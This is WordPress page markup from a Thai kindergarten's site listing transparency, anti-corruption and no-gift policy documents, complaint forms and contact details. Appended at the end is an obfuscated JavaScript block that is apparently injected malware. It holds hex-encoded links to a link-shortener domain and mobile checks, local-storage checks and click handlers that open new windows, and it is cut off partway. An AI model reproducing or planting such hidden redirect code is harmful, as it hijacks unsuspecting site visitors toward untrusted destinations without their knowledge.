900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\